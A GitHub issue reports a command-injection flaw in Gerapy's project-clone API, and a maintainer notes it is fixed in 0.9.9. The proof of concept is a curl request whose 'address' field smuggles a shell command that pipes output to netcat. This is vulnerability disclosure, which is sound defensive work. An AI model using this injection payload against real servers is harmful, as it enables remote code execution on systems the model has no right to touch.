An authenticated user can execute arbitrary command
ksg97031 opened this issue · 1 comments
ksg97031 commented
Describe the bug
The below code is vulnerable to remote code execution
https://github.com/Gerapy/Gerapy/blob/master/gerapy/server/core/views.py#L323-L343
To Reproduce
$ curl 'http://127.0.0.1:8000/api/project/clone' \
-H 'Accept: application/json, text/plain, */*' \
-H 'Content-Type: application/json;charset=UTF-8' \
-H 'Authorization: Token $token' \
--data-raw '{"address":"http;echo hi | nc 127.0.0.1 7777;"}'
$ nc -lvp 7777
hi
Germey commented
Fixed in 0.9.9